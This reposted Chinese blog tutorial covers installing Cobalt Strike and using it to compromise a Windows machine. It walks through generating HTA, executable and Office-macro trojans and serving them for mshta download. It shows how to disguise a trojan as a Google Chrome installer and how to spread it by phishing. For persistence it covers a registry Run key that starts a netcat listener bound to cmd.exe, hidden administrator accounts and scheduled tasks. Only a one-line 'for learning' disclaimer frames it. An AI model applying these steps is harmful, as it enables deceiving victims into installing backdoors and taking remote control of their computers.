cobaltstrike的安装与基础使用

news2025/1/19 16:58:32

数据来源 

      本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。 

Cobalt Strike是什么? 

        Cobalt Strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。

        CS主要是用来后期持久渗透、横向移动、流量隐藏、数据窃取的工具。当已经在目标机器上执行了CS的payload(有效载荷/攻击模块/攻击方式),它会创建一个 Beacon(远控木马功能)回连到 C2 服务器。

        C2:Command & Control server的简称,也就是命令与控制服务器

  

  •         - adscript:拓展应用的脚本
  •         - c2lint:用于检查 profile 的错误异常
  •         - teamserver:服务端程序
  •         - cobaltstrike,cobaltstrike.jar:客户端程序(java跨平台)
  •         - logs:目录记录与国标主机的相关信息
  •         - update.jar:用于更新CS
  •         - csthird - party:第三方工具

        最核心的就是 teamserver cobaltstrike.jar,分别是服务端和客户端 

kali安装cobaltstrike

 在 cs4.0目录下新建终端,然后运行服务端teamserver

        chmod +x teamserver                  # 给予服务端程序teamserver 执行权限(在linux中复制进来的文件默认是没有执行权限的)

        ifconfig eth0   # 可以查看kali的IP地址(可选)

        ./teamserver 192.168.0.104 user   # 运行服务端程序,192.168.0.104是本机IP,user   是要设置的连接密码(可改)

在 cs4.0目录下新建终端,输入如下命令运行客户端程序

java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

新建配置文件,连接CS服务器 

常用功能

  1. 链接到另外一个团队服务器
  2. 断开服务器连接
  3. 查看所有监听器
  4. 切换为pivot图[服务器节点]
  5. 切换为会话列表
  6. 切换为目标列表
  7. 查看凭据信息
  8. 查看下载文件
  9. 查看键盘记录
  10. 查看屏幕截图
  11. 生成stageless的exe木马文件
  12. 设定java自签名applet程序攻击
  13. 生成恶意Office宏攻击
  14. 建立web delivery
  15. 在web服务器上托管文件
  16. 管理在web服务器上的应用和文件
  17. 帮助
  18. 关于

Cobaltstrike简介- 监听器 Listener(3)

1. 内部 beacon 

  • Beacon DNS
  • Beacon HTTP
  • BeaconHTTPS
  • Beacon SMB
  • Beacon TCP

2. 外部 beacon [与其他工具联合使用时会用到]

  • Foreign HTTP
  • Foreign HTTPS

打开监听器配置

        创建一个新的监听器 -> 填写监听器名称(随便写,不重复就行)-> 选择有效载荷/攻击模块/攻击方式

         添加HTTP主机

        添加要在开启监听的HTTP端口:0-65535   在这个取值范围中1023以下的端口已经分配给了常用的一些应用程序,建议往大的填,避免端口被占用(重复)--> 最后保存即可

Cobaltstrike简介 -  Attacks(攻击)

Packages(封装/生成后门):

  • HTML Application         生成hta HTML应用程序
  • MS Office Macro          生成恶意宏放入 office 文件
  • Payload Generator      生成各种语言版本的 payload
  • Windows Executable   可执行文件  默认x86  勾选x64表示生成×64
  • Windows Executable(S) stageless生成全功能被控端

Web Drive-by:

  • Manage 管理当前 Team Server 开启的所有web服务
  • Clone site克隆某网站
  • Host File 在 Team Serve 的某端口提供Web以供下载某文件
  • Scripted Web Delivery 为 payload 提供web服务以便于下载和执行
  • System Profiler 用来获取系统信息:系统版本、Flash版本、浏览器版本等

 

攻击目标机器 - HTML Application(生成hta HTML应用程序

        1)生成hta文件 (木马文件)

        最后在桌面上就能找到木马程序

        2)提供端口下载文件(给受害者提供一个提供一个端口,让他可以下载我们的木马文件)

http://192.168.0.104:10067/download/file.ext

3)靶机执行远程命令  

         我这里开了一台win7虚拟机(受害者)访问木马连接(注意:win7虚拟机要和kali连接同一个网络,不然两者无法通信)

        测试win7和kali是否可以通信,使用命令:ping 目标IP地址(kali的ip)

        在win7的虚拟机的cmd中输入命令: mshta http://192.168.0.104:10067/download/file.ext   # 访问kali系统生成的木马文件,这是最基本的上线方式

攻击目标机器 - 操控目标机器

         当有目标主机以任何方式运行了生成的被控端,出现在主机列表。

        选中要操作的目标主机 -> 鼠标右键-> 进入beacon(交互命令界面),在此使用 Beacon Commands对目标主机执行各种操作。

        1)获取到对方的cmd权限

          sleep 0       # 设置beacon延迟时间为0毫秒,默认是60秒也就是说60秒命令才会成效一次

         也可以使用图形界面的方式更改延迟时间

        shell ipconfig   #  执行shell令,如果是在windows系统的命令行中我们要查看IP配置直接ipconfig   就可以了,但是在这里不行,要在前面加上shell

        2)使用文件管理器

        3)获取目标的远程桌面(VNC)

        4)获取目标的进程

        5)屏幕截图 

生成后门木马 - Windows Executable(Windows可执行文件)

        1)生成可执行文件

2. 捆绑软件 

        这个木马文件别人一看都不知道这是啥?都不会下载运行,所以我们要把木马文件和其它软件的安装包捆绑起来,让他们安装其它软件时就自动安装我们的木马

用到的软件 

  •  压缩软件:WinRAR_5
  •  软件图标:Restorator 
  • 再准备一个谷歌的安装程序(在网上随便搜一下就能下载),用来捆绑木马 

创建自解压文件(把木马文件捆绑都谷歌的安装程序上) 

解压路径可以放到公用:C:\Users\Public 

 

  

 现在软件的图标和谷歌的不一样我们改一下图标,打开Restorator

成功,捆绑软件 

 最后受害者运行我们制作的谷歌安装程序,我们在kali就能监听到

运行我们制作的程序一样是可以安装谷歌,所以一般人是不会怀疑的 

 kali这边就能监听到

3. 上传至目标机器

  • 通过 webshell上传、运行
  • 通过互联网传播、钓鱼

生成后门木马 - Office 宏病毒 

1. 为文档添加宏,保存打开正常的 office文件,如 test、docx

  • 视图 ···>宏 ···> 查看宏
  • 选择宏的位置为当前文档 ···> 输入宏名···> 创建
  • copy Macro 粘贴到宏命令处
  • 选择否,另存为docm文件

2. 上传至目标机器

  • 通过互联网邮箱、社交媒体、论坛传描
  • 诱导点击 

 实现:

        1)创建Office 宏病毒 代码

        2)创建一个docx文档,在桌面新建DOCX 文档并打开,前提你电脑没有安装WPS​​​​​然后安装WPS的VB宏插件,安装步骤一路下一步(可以选择安装路径)

 

写一些内容,最后保存文件

攻击完成后的操作

  • 开机自启动
  • 每次启动登录时都会按顺序自动执行

HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\windows\Currentversion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Explorer\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Policies\Explorer\Run

注册表的 HKEY_LOCAL_MACHINE 和 HKEY_CURRENT_USER 键的区别:前者对所有用户有效 ,后者对只对当前用户有效

上传nc(木马)

        upload nc.exe C:\\windows\\system32

查看自启动注册表项:

        reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

# 添加注册表,开机启动nc并开启监听

        reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C: \windows\system32\nc64.exe -Ldp 5555 -e cmd.exe’

# 查看注册表指定项值

        reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc 

隐藏账户

隐藏用户:

        net user admins Admin Passwoad!@/add&& net localgroup administratorsadmins /add°

激活 Guest 用户:

        net user guest Admin@hacker && net localgroup administrators guest /add net user guest /active:yes 

计划任务

        schtasks  /create /sc MINUTE /mo 1 /tr C:\Users\Administrator\Desktop\mx\5555.exe /tn test

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/155322.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python学习笔记——列表

Python列表函数&方法函数:len(list):列表元素个数max(list):返回列表元素最大值min(list):返回列表元素最小值list(seq):将元组转换为列表方法list.append(obj):在列表末尾添加新的对象list.count(obj)…

字典树总结

字典树 一、概念 字典树 (Trie) 是一种用于实现字符串快速存储和检索的多叉树结构; Trie 的每个节点都拥有若干个字符指针,若在插入或检索字符串时扫描到一个字符 ccc ,就沿着当前节点的 ccc 字符指针,走向该指针指向的节&…

支持向量机(SVM)入门(六,解决遗留问题)

但也出现了如下结果,看来任务没完没了(svm深似海?),还得下功夫:前面我们的支持向量机到此便止步了,一晃两年,这几天有空,顺便研究了一下,问题有进展&#xff…

基于yolov5-v7.0开发构建汽车车损实例分割检测识别分析系统

在之前的文章中我们已经做了很多基于yolov5完成实例分割的项目,感兴趣的话可以自行移步阅读:《基于YOLOv5-v7.0的药片污染、缺损裂痕实例分割检测识别分析系统》《基于yolov5-v7.0开发构建裸土实例分割检测识别模型》《基于yolov5-v7.0开发实践实例分割模…

NSThead的进阶使用和简单探讨

概述 NSThread类是一个继承于NSObjct类的轻量级类。一个NSThread对象就代表一个线程。它需要管理线程的生命周期、同步、加锁等问题,因此会产生一定的性能开销。 使用NSThread类可以在特定的线程中被调用某个OC方法。当需要执行一个冗长的任务,并且不想…

文件minio进阶 分页查询

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、minio使用二、代码1.mino版本是最新的,那么pom中也要最新的2. 部分代码总结前言 就是现在通过minio管理文件,然后不需要其他信息,所以我也就没有用传统方式…

探究视频标注如何支持自动驾驶汽车

自动驾驶汽车技术有望使我们的道路更安全,同时提高运输和交付服务的效率。安全性和可靠性是自动驾驶汽车广泛采用所必需的关键因素。为了保证汽车在现实复杂的交通条件下导航能够有效运行,必须使用标注数据来训练基于计算机视觉的模型,这些数…

verilog学习笔记- 10)按键控制 LED 灯实验

目录 简介: 实验任务: 硬件设计: 程序设计: 下载验证 : 总结与反思: 简介: 按键开关是一种电子开关,属于电子元器件类。我们的开发板上有两种按键开关:第一种是本实…

NeRF制作数据集最后的踩坑

之前对数据集渲染的时候一直出现模糊的问题: 学长说可能是摄像机和poses没有对应。但是为什么会这样呢 后来我发现,确实在制作的过程中,某一步出了问题,导致下标的数字,跟理想的不一样: 原来的12&#xf…

基于yolov5-v7.0开发构建工业机械齿轮瑕疵实例分割检测识别分析系统

在之前的文章中我们已经做了很多基于yolov5完成实例分割的项目,感兴趣的话可以自行移步阅读:《基于YOLOv5-v7.0的药片污染、缺损裂痕实例分割检测识别分析系统》《基于yolov5-v7.0开发构建裸土实例分割检测识别模型》《基于yolov5-v7.0开发实践实例分割模…

深度学习PyTorch 之 DNN-回归(多变量)

深度学习&PyTorch 之 DNN-回归中使用HR数据集进行了实现,但是HR数据集中只有一个变量,这里我们使用多变量在进行模拟一下 流程还是跟前面一样 #mermaid-svg-LN8ayy7UjtqZ6dSj {font-family:"trebuchet ms",verdana,arial,sans-serif;font…

计算机原理三_进程管理

目录儿四、进程管理4.1 什么是进程4.1.1 进程的结构4.1.2 进程的特征4.1.3 进程与线程4.1.4 线程的实现方式用户级线程内核支持线程组合线程的调度4.2 进程是怎么运行的4.2.1 进程状态4.2.2 进程控制4.2.2.1 原语的概念4.2.2.2 挂起与激活4.2.3 进程调度4.2.3.1 调度层次4.2.3.…

CSS入门一、初识

零、文章目录 文章地址 个人博客-CSDN地址:https://blog.csdn.net/liyou123456789个人博客-GiteePages:https://bluecusliyou.gitee.io/techlearn 代码仓库地址 Gitee:https://gitee.com/bluecusliyou/TechLearnGithub:https:…

【BP靶场portswigger-服务端9】服务端请求伪造SSRF漏洞-7个实验(全)

前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员&…

Episode 02 对称密码基础

一、从文字密码到比特序列密码 1、使用对称密钥进行加密 为了使原来的明文无法被推测出来,就要尽可能地打乱密文,这样才能达到加密的目的。密文打乱的是比特序列,无论是文本,图片还是音乐,只要能够将数据转换比特序列…

MSF后渗透持续后门

持续后门 ○ 利用漏洞取得的meterpreter shell运行于内存中,重启失效 ○ 重复exploit漏洞可能造成服务崩溃 ○ 持久后门保证漏洞修复后仍可远程控制 Meterpreter后门 run metsvc -A #删除-r use exploit/multi/handler set PAYLOAD windows/metsvc_bind_tcp se…

[22]. 括号生成

[22]. 括号生成题目算法设计:回溯算法设计:空间换时间题目 传送门:https://leetcode.cn/problems/generate-parentheses/ 算法设计:回溯 括号问题可以分成俩类: 括号的合法性判断,主要是用栈括号的合法生…

【自然语言处理】Word2Vec 词向量模型详解 + Python代码实战

文章目录一、词向量引入二、词向量模型三、训练数据构建四、不同模型对比4.1 CBOW4.2 Skip-gram 模型4.3 CBOW 和 Skip-gram 对比五、词向量训练过程5.1 初始化词向量矩阵5.2 训练模型六、Python 代码实战6.1 Model6.2 DataSet6.3 Main6.4 运行输出一、词向量引入 先来考虑一个…

IDEA远程快速部署SpringBoot项目到Docker环境

1.LInux上先安装docker环境 https://blog.csdn.net/YXWik/article/details/128643662 2.配置Docker远程连接端口 1. vim /usr/lib/systemd/system/docker.service 2. 找到ExecStar 在后面添加 -H tcp://0.0.0.0:2375 3. 退出编辑界面:先按esc,然后"…

【JAVA程序设计】(C00100)基于Springboot+html的前后端分离停车场管理系统

基于Springboothtml的前后端分离停车场管理系统项目简介项目获取开发环境项目技术运行截图项目简介 基于SpringBoothtml的前后端分离的停车场管理系统,本系统分为二种角色:管理员和收银员。 1.登录:管理员可以通过系统分配的账号…